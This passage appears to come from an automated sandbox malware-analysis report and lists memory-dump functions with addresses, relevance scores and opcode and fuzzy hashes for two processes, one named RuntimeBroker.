                                • Instruction ID: 6b26764c6eef555b922d19c099d7197b5965aed43c3d7f27d1a2f0b18e3b04fe
                                • Opcode Fuzzy Hash: e7dc29a35955b278efae6aee986d0e7884f4de60ed4d0c9ff055338a25d3e76d
                                • Instruction Fuzzy Hash: F3F0FF31A09A4D9FD794EB6888A99EC7FB0EF89300F8101FAD018C21A6DF3826958740
                                Function 00007FFD9B881F5D Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bdede532ddee9514012b7b832f074f6df6ac8f5da512e38ecea8f4a96c25c4ae
                                • Instruction ID: 00546f9ce1162d08cc01e83c3d14b5c17472899e9a186b3853980f44bc4bb86e
                                • Opcode Fuzzy Hash: bdede532ddee9514012b7b832f074f6df6ac8f5da512e38ecea8f4a96c25c4ae
                                • Instruction Fuzzy Hash: 91F02831D0EA4D4FD714EB6888655EC7FA0EF48200F4501F5D428C61E2EF386946C301
                                Function 00007FFD9B881241 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction ID: bcf24a5dc90924ff5e98082d103c336fa76c56cd22bf18f8858ea18e1c065664
                                • Opcode Fuzzy Hash: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction Fuzzy Hash: CEF0BE3050E64D8FCB66EF14C8556E93BA0FF5A300F0601AAE41CC71A2CB7ADA64CB81
                                Function 00007FFD9B888399 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction ID: 437673ff52f25dc9e5d84addf058de7c718753d71cebfc0fa07981ef6f5f75df
                                • Opcode Fuzzy Hash: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction Fuzzy Hash: 8CF03C3091DA8D8FDB51EB6888686ED7FF0FF19304F4504A7D458D60A2D7389544CB41
                                Function 00007FFD9B880528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction ID: e6f277bfdbd44c6b49878375b8cf172483cecaccf1affced6d632e91666cb1a1
                                • Opcode Fuzzy Hash: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction Fuzzy Hash: D6F05E30509A0E8FDB65EF5494116E577A0FF59304F000176E42CD6196CA35A660C781
                                Function 00007FFD9B881F15 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction ID: c3b67f0477bc8078d90c3d9f6a03a0dbe0e803dc6fb174bfdf36870062390c4a
                                • Opcode Fuzzy Hash: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction Fuzzy Hash: F0E09231C4FA8E4FD7216F6489661E97B60FF0A700F0616BAD06886092DB7C9628C741
                                Function 00007FFD9B8881E0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction ID: 61377d79ac162976e87490f508ceecd4766b034370dbb9cee9c3091ebeb45a03
                                • Opcode Fuzzy Hash: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction Fuzzy Hash: 1CE0D875989D4CCBCB649B599C5029477B1FB4D304F01026DE45CC7191D7355E56C301
                                Function 00007FFD9B88685C Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b885000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction ID: fdcc27c5cec694ea759e9b6e237a40e219626e3a4e5591844828d89103f0611b
                                • Opcode Fuzzy Hash: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction Fuzzy Hash: 23E06F32A0AE0C8BCB60AF98ACA028833A0FB8C308F01026AE45CC7180D3316A84C302
                                Function 00007FFD9B881C19 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction ID: efa91c2ae656b92b4a86e1885715b473e92c9d06697392523168f69425bc3470
                                • Opcode Fuzzy Hash: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction Fuzzy Hash: 3FE0A03184F78D4FD7626B6448611D57B70FF0A700F0A15A6D068C60A2DA6896588302
                                Function 00007FFD9B882536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ba156310b305f31fbd7db79d19f067d98083d904a6e18b2dda77b327021ab0f6
                                • Instruction ID: 9704568e44fcaf59ef3a7fe044004abd477650bee719da9c2c229fbe821ce071
                                • Opcode Fuzzy Hash: ba156310b305f31fbd7db79d19f067d98083d904a6e18b2dda77b327021ab0f6
                                • Instruction Fuzzy Hash: C1F0FE70A0485E4FDFA4EF18C894BA9B3B1FB58340F1086E6901DE3255DA30AE858F80
                                Function 00007FFD9B880530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: c7f4516cd99f28ee773ec3fcc90fa90195b457c14083bdfba21257d30318141a
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: D0E04F30509A0ECFDBA4EF58C4506A677A1FF5C304F100539E42CD6190CB35E6A0CB80
                                Function 00007FFD9B880C65 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e0fc64a6fd8a4642c3a168482128ce4e28a63733b02e530549a93f26266a26a
                                • Instruction ID: d6ffa96d12b60b6e865c631e7fe24e429e2db25493eef6e8ead7375b05eba859
                                • Opcode Fuzzy Hash: 6e0fc64a6fd8a4642c3a168482128ce4e28a63733b02e530549a93f26266a26a
                                • Instruction Fuzzy Hash: 7AD0E231F0592D8ECB64EA88E8107EDB771EF89311F8002B2C11CE3259CA306A428B81

                                Non-executed Functions

                                Function 00007FFD9B8806FA Relevance: 7.7, Strings: 6, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^U$O_^X$O_^f$O_^g
                                • API String ID: 0-1252858796
                                • Opcode ID: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction ID: e68626b80c5bcb7ef160820daebc656f64b3a71310be03e057027d77c6bd2453
                                • Opcode Fuzzy Hash: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction Fuzzy Hash: 03518C63B1FAC54FEB21279C3C651A83B90FF85B2171505F7E0A88A1A7F825A9468281
                                Function 00007FFD9B8806A5 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000015.00000002.1765975275.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_7ffd9b880000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_I$O_^J$O_^K$O_^f$O_^g
                                • API String ID: 0-2965963803
                                • Opcode ID: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction ID: 0bb0647acc2acea5912c8425b719c10f2b8562da3ca9080f8019508e275735f9
                                • Opcode Fuzzy Hash: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction Fuzzy Hash: 98517B63B1FAC54FEB3537AC7C641A82790FFC5B2171505F7E0A8CA0E7E865A9468281

                                Executed Functions

                                Function 00007FFD9B880F88 Relevance: .6, Instructions: 614COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0e0fb92451cc1fc14ad87ee0c46ccda97dac53ac31597343129f78dfcc28322
                                • Instruction ID: 48fcc4602367bde0715d6d6cbe19621428b49a5a8c787c89ff6e5876b857fdc6
                                • Opcode Fuzzy Hash: b0e0fb92451cc1fc14ad87ee0c46ccda97dac53ac31597343129f78dfcc28322
                                • Instruction Fuzzy Hash: B542D670E1962D8FDBA8DF68C890BEDB7B1FF58301F5041A9D05DA7295DA346A81CF40
                                Function 00007FFD9B8806E0 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^X$O_^f$O_^g
                                • API String ID: 0-2229697781
                                • Opcode ID: c0aae7f619c72a7d34a5754a6e1a0bad23f77d0228dafcfe696c9c02ba0d8583
                                • Instruction ID: 830afeb749aa1034fd8ad5ce9fc9ae177ac7369e4500445d1f2231cb7a6b684c
                                • Opcode Fuzzy Hash: c0aae7f619c72a7d34a5754a6e1a0bad23f77d0228dafcfe696c9c02ba0d8583
                                • Instruction Fuzzy Hash: B8618B63B0FA895FEB21679C7C651E83BA0FF85721B0501F7E06C8B1A7EC3469468381
                                Function 00007FFD9B880F98 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: &
                                • API String ID: 0-2822232526
                                • Opcode ID: 8f5c92dea6dcdfcc7bac974d0f7df484c5f00b0c73e73db0636be202b25c5d02
                                • Instruction ID: c6ff53ac27acfa268a1b92912935eb091b25625a40de8ce09f52d00d2af0eb81
                                • Opcode Fuzzy Hash: 8f5c92dea6dcdfcc7bac974d0f7df484c5f00b0c73e73db0636be202b25c5d02
                                • Instruction Fuzzy Hash: 70D13F71E19A5D8FEB5CDB58D8A4BACB7B1FF58300F4441B9E01DE32A6DA346981CB01
                                Function 00007FFD9B8804F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_^
                                • API String ID: 0-1127923838
                                • Opcode ID: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction ID: bb51e7dd59e50f40135fd3801b95d70a1a48146bff9db65f52470e26cb1b2de1
                                • Opcode Fuzzy Hash: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction Fuzzy Hash: 5301D231A0A65E8FC756EF6898A15F637A0FF05318F04017AE06CCA193EE38A555C791
                                Function 00007FFD9B887C89 Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f503292211ca5e3e6325d61f88441414949fe1898415304fa30686a7af93a766
                                • Instruction ID: e94f7477746e11276959438d61ba36926db5d89d2fd1a4adb1364317441380a7
                                • Opcode Fuzzy Hash: f503292211ca5e3e6325d61f88441414949fe1898415304fa30686a7af93a766
                                • Instruction Fuzzy Hash: BEC18B74A0AA1DCFEBA5DBA8C4957BC77B1FF58301F5141B9C01DD72A6CA386982CB40
                                Function 00007FFD9B883239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 016bae84c9833ea51a330e98985b215d400997632f3dc20f40a64b79aa758a90
                                • Instruction ID: ea4b5eaa335638d88dd602e3a0051662426f968d1270de9ae65784296307a287
                                • Opcode Fuzzy Hash: 016bae84c9833ea51a330e98985b215d400997632f3dc20f40a64b79aa758a90
                                • Instruction Fuzzy Hash: 60B15271E19A5D8FEB9CDB58D864BA8B7A1FF58300F0401B9E01DD72E6DE346981CB01
                                Function 00007FFD9B8805D8 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction ID: 5508ef69b63f5e3adaf1975dd8308f1c9f0e47ddbfa512388eaa37b1b539d82e
                                • Opcode Fuzzy Hash: 01bbf8e50bf36370b69fb5aa69bd9ef99db34f326d0c652107f9ccd778e1ff16
                                • Instruction Fuzzy Hash: BB81C231B1DE494BDB68EF5888605B977E2FF9C704B15417EE46EC32A2DE34AD028781
                                Function 00007FFD9B886163 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f95e884c2a7c0203d9ce30cb166406e2a3d5f7f898afcf774b6eccdb80d8e698
                                • Instruction ID: 009b58a162401399a357b9088ad46143b888c948cba1c63c144940808660d634
                                • Opcode Fuzzy Hash: f95e884c2a7c0203d9ce30cb166406e2a3d5f7f898afcf774b6eccdb80d8e698
                                • Instruction Fuzzy Hash: 35719470E14A1D8FEB94EFA8D895BECB7B1FF58300F5041BAD41DE3296DA3469818B41
                                Function 00007FFD9B88129D Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction ID: cc33624e63c8a795ed916fe0597753e52f242293ae017d1f46691da0bc5a88ff
                                • Opcode Fuzzy Hash: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction Fuzzy Hash: 7051C031B18A8E4FDB58DF1888645BA77E2FF9C304B15417EE46EC7292DE34E9028781
                                Function 00007FFD9B882CD9 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction ID: f7265e2cbb0f54c24ec97903a3b5348035567ebd98c9c27d109c1ad97466bcd2
                                • Opcode Fuzzy Hash: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction Fuzzy Hash: 0E513071A1995D8FDB94EF98C865AECBBF1FF59300F41016AE01DE72A2CA74A941CB40
                                Function 00007FFD9B88238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e002b6011d4ab12d7181614d8a0b9baf8ce2d4272ffdcaaa11e20261c38aee7
                                • Instruction ID: 5e008922eb80c9f7240ec87733c0ae67488c2927b5078b0c58119db938337675
                                • Opcode Fuzzy Hash: 8e002b6011d4ab12d7181614d8a0b9baf8ce2d4272ffdcaaa11e20261c38aee7
                                • Instruction Fuzzy Hash: 5A51D661A0EA994FEBA29BA88C657A87BA0EF59300F0540F7D09CC71E7DD346E85C741
                                Function 00007FFD9B881828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction ID: cfecb87381bc0584b196ba68d82882aaf02ce97d1dba5682117e0c51c367ed29
                                • Opcode Fuzzy Hash: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction Fuzzy Hash: E8317530E1EA1D8BE774BB9494227F8B2A1FF4D700F410279D06E921E5CF396A45C680
                                Function 00007FFD9B881CA9 Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7ce18b4655904d2a9fdf315b5e4a31c2836371e8521ddfe42bf438e97c790334
                                • Instruction ID: 0f376b320f89225ab7cad504622a52fbf7a09de9d57c702882d2933aaaa5a913
                                • Opcode Fuzzy Hash: 7ce18b4655904d2a9fdf315b5e4a31c2836371e8521ddfe42bf438e97c790334
                                • Instruction Fuzzy Hash: B4415E71E09A1DCFDB54EB98D864AECBBF1FF58300F4105AAD019E72A1DB349945CB40
                                Function 00007FFD9B885FDD Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a36d540589b71c5af71d2bca17a919f4c98cc15ccdd9e28b2c17fefaaa53418a
                                • Instruction ID: 32a4b4df9420d1cf4db402a8d89e3cdd79c789ee8d06a04ffbd586a745c4315e
                                • Opcode Fuzzy Hash: a36d540589b71c5af71d2bca17a919f4c98cc15ccdd9e28b2c17fefaaa53418a
                                • Instruction Fuzzy Hash: 3F415C70E14A4D8FDB94EBE8D865AEDBBF1FF48310F01057AE018E7296DA346941CB91
                                Function 00007FFD9B8864E9 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cbdc94f0687609db3012fa482f009acb4fc6ee6940b7258ea50d05139876822
                                • Instruction ID: 7170d031293ae6b36db9e77ef9fcb9f3ec5b4c7a0d05ecd0191f372ea23df8e2
                                • Opcode Fuzzy Hash: 9cbdc94f0687609db3012fa482f009acb4fc6ee6940b7258ea50d05139876822
                                • Instruction Fuzzy Hash: A541A070D0964D8FEB55DFA4C864AED7BB1FF49300F1101BAD019D729ACB399981CB41
                                Function 00007FFD9B8883F5 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f78235e1dfb327a2d7aedb792fa9967c1fdde81c677c173922888e968349c8e
                                • Instruction ID: e20aaa2e08e1a1f269beaff6995b30386643737bb99740abcef1397b5fa3815c
                                • Opcode Fuzzy Hash: 2f78235e1dfb327a2d7aedb792fa9967c1fdde81c677c173922888e968349c8e
                                • Instruction Fuzzy Hash: 7A314832E0961E8FDB68DFA4D4646FEB7B1EF58300F11017AE019E32D1CA396A41CB91
                                Function 00007FFD9B885931 Relevance: .1, Instructions: 97COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13b093d213f2b6510d7ff21a53b65d97b80ffce6b2d0f593e70688be96fd45d1
                                • Instruction ID: 61ca9a4868cbd5f808d3e8db7f60af823650a61e01a6b4379761b0681a970522
                                • Opcode Fuzzy Hash: 13b093d213f2b6510d7ff21a53b65d97b80ffce6b2d0f593e70688be96fd45d1
                                • Instruction Fuzzy Hash: FB31F32060EACD4FD7A69B748865AE47FB1EF4A310F0904FED089EB197C9289845C352
                                Function 00007FFD9B882BC9 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62a73fea51e8f21aa845cc03f42e57a420d0004972687c5619cbee8d798b8c0f
                                • Instruction ID: 505111a99b68d92cd3c248e9f266e661c3c682d7a4c37cfa385b5f6dd85bedd8
                                • Opcode Fuzzy Hash: 62a73fea51e8f21aa845cc03f42e57a420d0004972687c5619cbee8d798b8c0f
                                • Instruction Fuzzy Hash: 1B312A70D0A64D8FDB55DFA8D8646EDB7B1FF59300F10047AE019E3291DB389940CB81
                                Function 00007FFD9B885A72 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000017.00000002.1759753665.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_23_2_7ffd9b880000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
